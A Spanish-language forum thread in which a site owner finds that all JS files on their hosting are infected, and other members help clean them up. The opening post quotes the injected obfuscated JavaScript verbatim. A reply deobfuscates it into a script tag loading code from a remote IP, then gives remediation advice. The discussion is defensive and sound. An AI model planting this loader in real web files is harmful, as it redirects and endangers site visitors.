Ayuda! Archivos js infectados

  • Autor Autor cinewow
  • Fecha de inicio Fecha de inicio
C

cinewow

1
Iota
Diseñador
Verificación en dos pasos activada
Verificado por Whatsapp
Suscripción a IA
Hola amigos de forobeta, muy buenas tardes.
bueno resulta que todos los archivos js que tengo alojados en mi servicio de hosting, se encuentran infectados con el siguiente codigo al inicio del archivo:
HTML:
var _0x82ab=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x82ab[5]](_0x82ab[4][_0x82ab[3]](_0x82ab[0])[_0x82ab[2]]()[_0x82ab[1]](_0x82ab[0]))

y resulta que eso redirecciona mi sitio web a una pagina de publicidad.
queria preguntarles si alguien sabe como eliminar eso de todos los archivos js y como eliminar de raiz el virus.
muchas gracias, agradezco cualquier ayuda, me encuentro estresado por este problema.

:encouragement::encouragement::encouragement::encouragement::encouragement:
 
Se que suena tonto pero probaste con la funcion de CPANEL de limiar virus, a mi una vuelta me sucedio similar y fue la solucion. Saludos
 
Se que suena tonto pero probaste con la funcion de CPANEL de limiar virus, a mi una vuelta me sucedio similar y fue la solucion. Saludos

no espara nada tonto, pero eso no me detecta ese timpo de injection. :grumpy:

- - - Actualizado - - -

Se que suena tonto pero probaste con la funcion de CPANEL de limiar virus, a mi una vuelta me sucedio similar y fue la solucion. Saludos

no espara nada tonto, pero eso no me detecta ese timpo de injection. :grumpy:
 
La otra que se me ocurre es que armes una funcion scraper que recorra todo tu sitio buscando esa linea y la elimines. SI estas en skype agregame media.master.web
 
No tienes ninguna copia de seguridad? De todas formas piensa que una vez quitado deberás segurizar el sitio, cambiar todas las claves para asegurarte que no se te vuelva a infectar.
 
Podrias ser mas especifico, el sitio es un Wordpress? En ese caso el theme es comprado o nulled?


Enviado mediante Tapatalk
 
No tienes ninguna copia de seguridad? De todas formas piensa que una vez quitado deberás segurizar el sitio, cambiar todas las claves para asegurarte que no se te vuelva a infectar.

Es que necesito eliminar el script que se ejecuta cada x tiempo y me vuelve a infectar los archivos de todo el host, no de un solo sitio en especifico. 🙁

- - - Actualizado - - -

Podrias ser mas especifico, el sitio es un Wordpress? En ese caso el theme es comprado o nulled?


Enviado mediante Tapatalk

no es un solo sitio, me afecto todos los sitios, hasta los mios desarrollados desde cero. 🙁

- - - Actualizado - - -

La otra que se me ocurre es que armes una funcion scraper que recorra todo tu sitio buscando esa linea y la elimines. SI estas en skype agregame media.master.web

esa idea tuya me parece muy tentadora, pero seria algo que demoraria mucho, ya que este virus no me ha afectado un solo sitio, si no todos, osea todos los archivos js que tengo en el hosting fueron afectados.
 
El código desobfuscado es algo así:
Insertar CODE, HTML o PHP:
document.write('>tpircs/<>"sj.yreuqj/87.611.942.431//:ptth"=crs tpircs<'.split("").reverse().join(""))
Es decir lo que hace es escribir esto en tu HTML:
HTML:
<script src="http://134.249.116.78/jquery.js"></script>
Buscando esa IP en google encontrarás bastante información sobre estos ataques.

Yo lo que haría es con un programa de edicion de código (Por ejemplo VS Code) usar las herramientas de busqueda y reemplazo en archivos para:
1- Buscar el código malicioso en los archivos JS
2- Eliminar el código malicioso (con la función de reemplazar)
3- Buscar el posible archivo que infecta los JS cada X tiempo

Después como medida de precaución lo más aconsejable es que bloquees esa IP y luego también puedes implementar en tu sitio mediante HTML una verificación de la integridad de los JS antes de cargarlos (véase Subresource Integrity - Web security | MDN) que es algo fácil de hacer y que evitará que el archivo js se cargue en caso de estar infectado. Esto no es una solucion definitiva, ya que en caso de estar infectado el archivo las funcionalidades JavaScript de tu web tampoco funcionarán, pero mientras no consigues eliminar la infección definitivamente servirá para que tus usuarios no sean redirigidos a páginas maliciosas y/o de publicidad.
 
Última edición: